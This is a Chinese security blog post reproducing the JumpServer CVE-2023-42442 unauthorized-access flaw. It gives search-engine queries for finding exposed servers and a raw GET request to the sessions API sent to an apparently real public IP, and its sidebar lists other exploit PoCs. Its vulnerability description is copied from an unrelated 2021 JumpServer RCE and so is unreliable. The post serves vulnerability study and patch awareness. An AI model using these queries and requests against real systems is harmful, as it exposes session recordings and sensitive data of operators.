JumpServer未授权访问漏洞 CVE-2023-42442

最新推荐文章于 2024-04-02 16:46:28 发布
最新推荐文章于 2024-04-02 16:46:28 发布
阅读量930 收藏 3
点赞数
分类专栏: 网络安全漏洞复现 文章标签: 网络安全 python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/holyxp/article/details/133066481
版权

JumpServer未授权访问漏洞 CVE-2023-42442

免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

一、漏洞描述

JumpServer 是全球首款完全开源的堡垒机, 使用GNU GPL v2.0 开源协议, 是符合4A 的专业运维审计系统。 JumpServer 使用Python / Django 进行开发。2021年1月15日,阿里云应急响应中心监控到开源堡垒机JumpServer发布更新,修复了一处远程命令执行漏洞。由于 JumpServer 某些接口未做授权限制,攻击者可构造恶意请求获取到日志文件获取敏感信息,或者执行相关API操作控制其中所有机器。

二、漏洞影响

JumpServer 3.0.0 - 3.6.3

在这里插入图片描述

三、网络测绘

fofa:

app="JumpServer-堡垒机"

hunter:

app.name="JumpServer"

四、漏洞复现

poc

/api/v1/terminal/sessions/

通过burp发送请求包

GET /api/v1/terminal/sessions/ HTTP/1.1
Host: 112.85.138.12:81
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

在这里插入图片描述

回显200就说明有问题

小龙POC检测

小龙POC传送门【已经更新】: 小龙POC工具
在这里插入图片描述

五、修复建议

更新到最新版本

安全攻防赵小龙
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
CVE-2023-28252 CLFS Windows 本地提权漏洞 POCC 源码
08-23
CVE-2023-28252 是一个存在于 clfs.sys(通用日志文件系统驱动程序)中的越界写入漏洞。 卡巴斯基披露该在野0day提权漏洞是一个越界写入(增量)漏洞,当目标系统试图扩展元数据块时被利用来获取system权限———Windows中最高的用户权限级别。该漏洞允许改变基础日志文件,迫使系统将基础日志文件中的假元素视为真实元素。其通过改变指向内存中一个特定的公共日志文件系统(CLFS)结构的偏移值,使之指向一个恶意结构。此外其在用户层面提供一个指向受控内存的指针,以获得内核的读/写权限。CLFS结构是Windows操作系统使用的CLFS通用日志系统的一部分,它由物理日志文件、日志流、日志记录等组成。 受影响版本  Windows7/8/9/10/11 Windows Server 2008/2012/2016/2018/2019/2022  #include "clfs_eop.h" // Global Variables IO_STATUS_BLOCK status_block = { 0 }; UINT64 offset_SeSetAccess = 0;
CVE-2023-40477 WinRAR 远程代码执行漏洞 PoC
09-02
WinRAR 拥有超过 500 亿用户,面临新漏洞CVE-2023-40477、CVE-2023-38831)。 今天,我们首次展示:CVE-2023-40477 的 PoC。 尽管 RCE 被认为是可利用的,但由于多种原因,其在实现过程中看起来并不乐观。 我们在此展示全面的技术研究:其影响、可利用的场景和缓解措施。 该漏洞已在最近的 WinRAR v6.23 中修复,我们在这里还提供了另一种缓解措施。 ​ ​ 尽管其 CVE 等级很高,但成功利用所需的复杂性表明广泛滥用的可能性很低,这与广泛利用的 Log4j RCE 漏洞不同。  有趣的是,Chromium似乎也利用了unrar库:https://chromium.googlesource.com/chromium/src//6ff23b0604e2edbe7ef282564ea340f5c72ab91a^/ unrar库作为第三方依赖项合并到Chrome OS中是合理的,尽管没有显示其用法的代码引用。 在缓解策略方面,有几种可行的选择可供考虑: 完全修复:将 Winrar 更新到 6.23+ 将完全修复该问题。 修补程序
漏洞复现】JumpServer(CVE-2024-29201、29202) 附带POC
最新发布
qq_43355651的博客
04-02 1962
漏洞复现
CVE-2021-21975:Nmap脚本检查漏洞CVE-2021-21975
04-06
CVE-2021-21975 Nmap脚本检查漏洞CVE-2021-21975 漏洞参考: 博客 例子 nmap -p443 --script cve-2021-21975.nse --script-args vulns.showall IP
CVE-2023-21768 Windows AFD 本地提权漏洞 C 源码
08-23
CVE-2023-21768 Windows Ancillary Function Driver (AFD) afd.sys本地提权漏洞。 AFD (Ancillary Function Driver)是Windows操作系统中的一个内核模式驱动程序。 漏洞原理: 该漏洞存在于AFD驱动程序处理用户模式输入/输出(I/O)操作的方式中。具体来说,该漏洞允许攻击者向AFD驱动程序发送恶意输入/输出控制(IOCTL)请求,这可能导致以提升的权限执行任意代码。  受影响系统 : Windows 11 Version 22H2 for x64-based Systems Windows 11 Version 22H2 for ARM64-based Systems Windows 11 version 21H2 for ARM64-based Systems Windows 11 version 21H2 for x64-based Systems Windows Server 2022 (Server Core installation) Windows Server 2022
Nginx越界读取缓存漏洞 CVE-2017-7529
03-13
Nginx在反向代理站点的时候,通常会将一些文件进行缓存,特别是静态文件。缓存的部分存储在文件中,每个缓存文件包括“文件头”+“HTTP返回包头”+“HTTP返回包体”。如果二次请求命中了该缓存文件,则Nginx会直接将该文件中的“HTTP返回包体”返回给用户。 如果我的请求中包含Range头,Nginx将会根据我指定的start和end位置,返回指定长度的内容。而如果我构造了两个负的位置,如(-600, -9223372036854774591),将可能读取到负位置的数据。如果这次请求又命中了缓存文件,则可能就可以读取到缓存文件中位于“HTTP返回包体”前的“文件头”、“HTTP返回包头”等内容
Jumpserver-EXP:JumpServer远程代码执行临时检测利用脚本
03-05
跳转服务器EXP JumpServer远程代码执行临时检测利用脚本 进攻地址: : 用法 脚本在python3环境下编写。 运行脚本: python jumpserver-exp.py [address] 如:python jumpserver-exp.py http://192.168.18.182:8080 运行过程中根据提示输入选择。 功能 阅读日志 运行脚本初期,会先读取目标日志文件,替换路径为/ws/ops/tasks/log/ 。如果日志路径与路径路径不符,且已知实际路径,请自行修改代码。从中检测出可能被利用的目标资产,以<asset>的格式列出。 检测目标可连接性,筛选可用资产 针对上一步列出的目标列表,逐个判活,检测可用性,替换可用目标附带编号列出。 执行命令 (1)脚本询问用户,是否选择进一步攻击?输入yes继续,
漏洞预警:JumpServer授权访问漏洞CVE-2023-42442)
yuanlirong22的专栏
09-19 1960
JumpServer堡垒主机API接口/api/v1/terminal/sessions/权限控制被破坏,该API会话重放可以在没有身份验证的情况下下载。利用该漏洞可以访问录像文件,远程获取到敏感信息。
JumpServer 授权接口远程代码执行漏洞
weixin_46145442的博客
01-23 1746
漏洞简述及影响版本 由于 JumpServer 某些接口授权限制,攻击者可构造恶意请求获取到日志文件获取敏感信息,或者执行相关API操作控制其中所有机器。 JumpServer < v2.6.2 JumpServer < v2.5.4 JumpServer < v2.4.5 JumpServer = v1.5.9 环境要求: 处理器:4个 系统:CentOS7 内存:8G 系统语言:英文 踩坑: 先配置好CentOS访问github的加速地址...
漏洞复现】JumpServer授权访问漏洞(CVE-2023-42442)
做自己喜欢的事,并将其发挥到极致!
09-20 1315
JumpServer是一款开源的堡垒机和权限管理系统,旨在帮助企业实现对服务器和网络设备的安全管理和访问控制。JumpServer的权限管理存在缺陷,授权的远程攻击者可以下载历史会话连接期间的所有操作日志。经过分析和研判,该漏洞利用难度低,可导致敏感信息泄漏。
JumpServer 授权接口 远程命令执行漏洞
PeiQi的博客
01-19 4087
JumpServer 授权接口 远程命令执行漏洞 漏洞描述 JumpServer 是全球首款完全开源的堡垒机, 使用GNU GPL v2.0 开源协议, 是符合4A 的专业运维审计系统。 JumpServer 使用Python / Django 进行开发。2021年1月15日,阿里云应急响应中心监控到开源堡垒机JumpServer发布更新,修复了一处远程命令执行漏洞。由于 JumpServer 某些接口授权限制,攻击者可构造恶意请求获取到日志文件获取敏感信息,或者执行相关API操作控制其中所有机器。
CVE-2023-6548 和 CVE-2023-65的Citrix Netscaler/ADC-13.0-92.21 最新补丁
01-19
针对CVE-2023-6548 和 CVE-2023-6549 的 NetScaler ADC 和 NetScaler Gateway 的漏洞补丁升级包 CVE-2023-6548 :在管理接口上执行经过身份验证的(低特权)远程代码 CVE-2023-6549:拒绝服务 2、 强烈建议受影响的 NetScaler ADC 和 NetScaler Gateway 客户尽快安装相关的更新版本。 NetScaler ADC 和 NetScaler Gateway 14.1-12.35 及更高版本 NetScaler ADC 和 NetScaler Gateway 13.1-51.15 及更高版本的 13.1 NetScaler ADC 和 NetScaler Gateway 13.0-92.21 及更高版本的 13.0 NetScaler ADC 13.1-FIPS 13.1-37.176 及更高版本的 13.1-FIPS NetScaler ADC 12.1-FIPS 12.1- 版本:Citrix ADC-13.0-92.21
OpenSSH(CVE-2023-38408)一键升级修复-OpenSSH9.5p1
10-17
一键备份升级Openssh9.5p1 解决CVE-2023-38408,具体步骤见
jumpserver_rce
05-27
jumpserver_rce 根据官方报告,这个漏洞的影响版本如下: < v2.6.2 < v2.5.4 < v2.4.5 = v1.5.9 经过测试v1.5.8的Koko无法进行利用,因为它在创建WebSocket连接之后对用户身份进行了鉴权,具体代码看: 判断JumpServer的版本 有个比较简单的办法,就是访问/luna/页面的js进行提取,具体实现放在了luna_version.py中 有限的文件读取漏洞 限制主要如下 只能读取以 log 结尾的文件 首先需要使用readlog.py读取日志文件,看其中有没有必要的信息 主要是三个信息 user id asset id system user id 这三个 ID 都是自动生成的 UUID,没法进行遍历 如果jumpserver的日志目录等级是 INFO,拿到的信息就很少了 可以利用这个漏洞去读取一些系统上其它的日志,看看有没有什么
CVE-2023-42442:JumpServer堡垒机会话回放授权访问漏洞复现
薛定谔嘚喵博客
09-25 334
Jumpserver是一款开源的堡垒主机和专业的运维安全审计系统,JumpServer存在授权访问漏洞(CVE-2023-42442):经身份验证的远程攻击者利用该漏洞可以访获取敏感信息。JumpServer堡垒机的/api/v1/terminal/sessions/接口由于权限控制不严格,导致可以在授权的情况下获取到堡垒机的历史会话回放列表,这是官方在公告中声明的身份认证问题。
JumpServer存在授权访问漏洞CVE-2023-42442) 附POC
nnn2188185的博客
09-22 812
Jumpserver是一款开源的堡垒主机和专业的运维安全审计系统,JumpServer存在授权访问漏洞(CVE-2023-42442):经身份验证的远程攻击者利用该漏洞可以访获取敏感信息。
[CVE-2023-42442]JumpServer 会话录像文件授权访问漏洞
whoami
09-19 625
JumpServer受影响版本中,由于会话回放录像接口/api/v1/terminal/sessions/鉴权不当,授权的攻击者可以通过直接访问/api/v1/terminal/sessions/接口查看并下载会话回放录像数据。是一个抽象基类,它定义了一组用于权限判断的方法,但它本身并没有提供任何默认的权限控制逻辑。由于jumpserver 很多用户还升级到3以上版本,读者们可以自行搭建漏洞版本范围内的版本进行测试。临时策略可禁止访问/api/v1/terminal/sessions/接口。
漏洞分析 | JumpServer授权访问漏洞CVE-2023-42442)
WangsuSecurity的博客
01-25 563
由于JumpServer某接口授权限制,允许任何经身份验证的用户获取session信息,最终结合目录权限绕过下载录像文件,其中可能包含敏感信息,如密码、历史命令等。
mysql安全漏洞CVE-2023-0215
07-29
很抱歉,但我无法回答关于"mysql安全漏洞CVE-2023-0215"的问题。因为在您提供的引用内容中,并没有提到与该漏洞相关的信息。如果您有其他关于该漏洞的引用内容或更多的背景信息,我将很乐意为您提供帮助。 #### 引用[.reference_title] - *1* *3* [CVE-2023-21839漏洞本地简单复现](https://blog.csdn.net/csdnmmd/article/details/129247272)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [CVE-2023-0215](https://blog.csdn.net/qq_39933800/article/details/131203431)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

安全攻防赵小龙

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值